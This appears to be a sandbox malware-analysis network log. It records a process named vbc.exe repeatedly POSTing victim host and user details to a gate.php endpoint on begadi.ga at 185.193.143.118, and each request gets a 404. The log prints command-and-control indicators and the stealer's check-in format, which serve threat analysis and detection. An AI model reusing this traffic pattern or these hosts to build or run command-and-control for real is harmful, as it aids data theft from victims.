Dec 21, 2020 08:33:41.767617941 CET	642	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:41.895755053 CET	643	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.22	49188	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:42.188874006 CET	643	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:42.251842976 CET	644	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:42.381172895 CET	644	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.22	49189	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:42.666408062 CET	645	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:42.724617958 CET	645	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:42.848618984 CET	645	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.22	49190	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:43.123722076 CET	646	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:43.186587095 CET	646	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:43.317317009 CET	647	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.22	49191	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:43.611074924 CET	648	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:43.670574903 CET	648	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:43.801179886 CET	648	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.22	49192	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:44.096730947 CET	649	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:44.159651041 CET	649	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:44.293749094 CET	649	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.22	49193	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:44.571158886 CET	650	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:44.634759903 CET	651	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:44.761157990 CET	651	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.22	49194	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:45.056071043 CET	652	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:45.122592926 CET	652	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:45.256386995 CET	652	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.22	49195	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:45.531713009 CET	653	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:45.593708992 CET	653	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:45.724093914 CET	654	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.22	49196	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:46.000245094 CET	654	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:46.062572956 CET	655	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:46.197207928 CET	655	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:33.482024908 CET	619	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:33.541044950 CET	619	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:33.668128967 CET	619	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.22	49197	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:46.505912066 CET	656	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:46.563626051 CET	656	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:46.689477921 CET	656	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.22	49198	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:46.952497005 CET	657	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:47.014899015 CET	657	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:47.145210028 CET	658	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.22	49199	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:47.436851978 CET	659	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:47.500144958 CET	659	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:47.628328085 CET	659	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.22	49200	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:47.907512903 CET	660	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:47.971669912 CET	660	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:48.102720976 CET	660	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.22	49201	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:48.399306059 CET	661	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:48.460774899 CET	661	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:48.594541073 CET	662	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.22	49202	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:48.868225098 CET	663	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:48.929223061 CET	663	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:49.054697990 CET	663	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.22	49203	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:49.345743895 CET	664	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:49.410888910 CET	664	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:49.538414955 CET	665	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.22	49204	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:49.842369080 CET	665	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:49.901842117 CET	666	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:50.024385929 CET	666	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.22	49205	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:50.305217981 CET	667	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:50.367908001 CET	667	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:50.502685070 CET	667	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.22	49206	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:50.800059080 CET	668	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:50.863985062 CET	668	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:50.995313883 CET	669	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:33.982963085 CET	620	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:34.044864893 CET	620	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:34.172879934 CET	621	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

